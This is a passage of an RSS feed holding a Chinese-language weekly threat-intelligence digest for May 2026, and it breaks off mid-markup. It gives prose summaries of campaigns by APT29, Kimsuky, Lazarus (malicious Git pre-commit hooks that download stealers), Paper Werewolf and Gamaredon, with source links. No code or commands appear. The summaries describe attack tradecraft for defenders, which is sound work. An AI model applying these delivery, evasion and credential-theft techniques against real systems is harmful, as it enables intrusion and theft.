YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://cyberwebspider.com/security-week-news/urgent-advisory-exchange-server-zero-day/" target="_blank">https://cyberwebspider.com/security-week-news/urgent-advisory-exchange-server-zero-day/</a></span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://www.news4hackers.com/microsoft-warns-hackers-exploiting-unpatched-exchange-server-vulnerability" target="_blank">https://www.news4hackers.com/microsoft-warns-hackers-exploiting-unpatched-exchange-server-vulnerability</a></span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://radar.offseq.com/microsoft-warns-exchange-server-zero-day-exploited-wild" target="_blank">https://radar.offseq.com/microsoft-warns-exchange-server-zero-day-exploited-wild</a></span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://healsecurity.com/on-prem-microsoft-exchange-server-cve-2026-42897-exploited-via-crafted-email" target="_blank">https://healsecurity.com/on-prem-microsoft-exchange-server-cve-2026-42897-exploited-via-crafted-email</a></span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://allthingsgeek.me/exchange-zero-day-vulnerability-being-exploited" target="_blank">https://allthingsgeek.me/exchange-zero-day-vulnerability-being-exploited</a></span></span></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=63545f6c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518833%26idx%3D1%26sn%3D2a77ea8001191d2debe33540842c66e4">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 18 May 2026 11:32:00 +0800</pubDate>
    </item>
    <item>
      <title>每周高级威胁情报解读(2026.05.08~05.14)</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518815&amp;idx=1&amp;sn=bc9a60ac5943fb9a8e839c9be78483f8</link>
      <description>EasterBunny：归因于APT29的高级间谍工具；Kimsuky组织依托GitHub+Dropbox分发恶意载荷；Lazarus Group 利用 Git 钩子隐藏恶意软件；Paper Werewolf使用新工具包针对俄罗斯工业、金融和运输组织；Gamaredon的感染链：伪造电子邮件、GammaDrop和GammaLoad</description>
      <content:encoded><![CDATA[<p><span>威胁情报中心</span> <span>2026-05-15 10:30</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=1e5ffa6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqiclsCqfgNg3RpGFcX4XwcS2ZvnDD9t73Q3bVYQsxmSibjHs7LSVQZRZ8mQlMf9WicT82xxmIibau1YWsjucTW8yJC9hU5YfrzeRNw%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>EasterBunny：归因于APT29的高级间谍工具；Kimsuky组织依托GitHub+Dropbox分发恶意载荷；Lazarus Group 利用 Git 钩子隐藏恶意软件；Paper Werewolf使用新工具包针对俄罗斯工业、金融和运输组织；Gamaredon的感染链：伪造电子邮件、GammaDrop和GammaLoad</p>
  <div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;box-sizing: border-box;"><p style="display: inline-block;box-sizing: border-box;"><span style="display: block;padding: 0.3em 0.5em;border-radius: 0.8em 0.8em 0px 0px;background-color: rgb(55, 113, 187);color: rgb(255, 255, 255);box-sizing: border-box;" title=""><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026.05.08~05.14</span></p></span></p><div style="border: 1px solid rgb(55, 113, 187);border-radius: 0px 0px 0.8em 0.8em;padding: 10px;box-sizing: border-box;"><div style="line-height: 1.75;text-align: justify;font-size: 14px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">EasterBunny：归因于 APT29 的高级间谍工具</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Kimsuky组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Lazarus Group 利用 Git 钩子隐藏恶意软件</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Paper Werewolf 使用新工具包针对俄罗斯工业、金融和运输组织</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Gamaredon的感染链：伪造电子邮件、GammaDrop和GammaLoad</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Seedworm 入侵韩国电子制造商</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">两项人工智能增强型威胁活动瞄准拉丁美洲政府和金融部门</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">富士康证实遭到Nitrogen勒索软件团伙的网络攻击</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">42个TanStack包遭供应链劫持：6分钟植入84个恶意版本</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Gentlemen 勒索软件遭到入侵</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">某加密IM官网供应链事件，“离岸”爱国者卷土重来</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">黑客滥用谷歌广告和 Claude.ai 聊天功能推送 Mac 恶意软件</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意模仿 Anthropic 的 Claude 网站会导致后门植入</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AD CS 升级内幕：剖析高级滥用技术和工具</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI软件仿冒攻击再现，DeepSeek TUI成伪装诱饵</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">微软补丁日通告：2026年5月版</span></p></li></ul></div></div></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035146" src="https://wechat2rss.xlab.app/img-proxy/?k=4ddf9af7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8x6pibP22LKP4hS6VuzdVryShJseps5j0zvu101qV4jzgWXOnDGZyK0UJkUI510CVYRn5j0qiaDwwicleKRhAhY8lovNZiaAAJUNs%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035143" src="https://wechat2rss.xlab.app/img-proxy/?k=cebd3194&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8gX7PSk8oaAs2K4AhwsoIVEw1ONnpI2DZYpxjyJQeBu2juTbnRGOyRPZqCEbblkp05B2pID3XKP1mibLS7e0I3ZQhab5DwaosM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035145" src="https://wechat2rss.xlab.app/img-proxy/?k=6000437d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8E2ib8ibv2CAkp7ia2uywNcPdRibtPrYmVM5ZI3sa8NySlJdE6yT5icwe9CEa1CkicibxmicxLYINSMyKqcf52wy0ALkgSlG7ZpPQOzok%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035147" src="https://wechat2rss.xlab.app/img-proxy/?k=39ab8454&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqib9GJvkoGqvyBkGEDuTpL1faqsxhEP2Naj3LkssPZR6eEMjWuCwK1ibmWEibn497qdJHZT3xPd9JNkt6ojGAdDNUA4tJYXwPLJQk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">EasterBunny：归因于 APT29 的高级间谍工具</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月6日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://lab52.io/blog/wp-content/uploads/2026/05/LAB52EasterBunny.pdf" target="_blank">https://lab52.io/blog/wp-content/uploads/2026/05/LAB52EasterBunny.pdf</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">EasterBunny是APT29组织高度定制化的模块化后门，采用多层嵌套加载器与位置无关代码，利用目标机器的BIOS UUID、MachineGuid等系统特征生成解密密钥，使样本仅能在指定主机上运行，有效对抗沙箱和逆向分析。通信流量伪装成Google广告的Cookie字段和JavaScript脚本，支持通过C2下发模块动态加载DCSync等凭证窃取功能，实现持久化情报收集与后门控制。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Kimsuky组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月13日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/Ibz3FeA7twg-VCujA3cV_g" target="_blank">https://mp.weixin.qq.com/s/Ibz3FeA7twg-VCujA3cV_g</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Kimsuky组织通过伪装成访谈文档的LNK文件发起钓鱼攻击，利用PowerShell脚本从自身解密并打开诱饵文档以迷惑受害者，同时从Dropbox和GitHub下载多阶段VBS和PowerShell载荷，最终以反射加载方式执行AsyncRAT变种。该木马采用插件化架构，按需加载功能模块，收集主机信息后回传至C2服务器，攻击者通过GitHub仓库存储加密载荷和测试样本，实现持续化的隐蔽控制。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035144" src="https://wechat2rss.xlab.app/img-proxy/?k=c33fb097&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq80dPichHUNicHdNoK2VwJiaDVNq6icfg1zJp8r55yzic8C2HuhdlKlaQwpibGb0IZmwEsPpfJFysTsmNQBk3TJkGnDXtQufwxYibMwls%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Lazarus Group 利用 Git 钩子隐藏恶意软件</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月6日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://opensourcemalware.com/blog/dprk-git-hooks-malware" target="_blank">https://opensourcemalware.com/blog/dprk-git-hooks-malware</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Lazarus组织在其Contagious Interview/TaskJacker活动中，将恶意载荷的投放方式从以往利用VS Code的tasks.json或package.json postinstall脚本，转向隐藏在Git钩子中。攻击者通过伪造的加密货币或DeFi技术面试机会，诱导开发者克隆包含恶意pre-commit钩子的代码仓库，当候选人首次尝试提交代码时，钩子脚本自动执行，根据操作系统从precommit.vercel.app下载并运行对应的第二阶段载荷（最终投放InvisibleFerret或BeaverTail木马），用于窃取加密货币钱包和浏览器凭证。该手法利用了开发者对Git钩子等常规工具的信任，同时规避了微软对VS Code自动执行任务逐步加强的限制。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Paper Werewolf 使用新工具包针对俄罗斯工业、金融和运输组织</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月13日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://bi-zone.medium.com/tinker-tailor-soldier-paper-werewolfs-latest-toolkit-3a4bb578880e" target="_blank">https://bi-zone.medium.com/tinker-tailor-soldier-paper-werewolfs-latest-toolkit-3a4bb578880e</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Paper Werewolf组织在2026年3月至4月期间针对俄罗斯工业、金融和运输机构发起钓鱼攻击，使用包含恶意链接的PDF诱饵，通过Inno Setup安装器释放EchoGather远控木马和PDF诱饵文档。该组织还部署了自定义PaperGrabber窃取器，用于收集本地、网络和可移动驱动器中的文件，窃取浏览器凭证和Telegram数据，并采用JS、Python、C++等多阶段下载器与Mythic框架植入物进行隐蔽通信和载荷执行。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">05</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Gamaredon的感染链：伪造电子邮件、GammaDrop和GammaLoad</span></strong></p></div></div></div></div><div 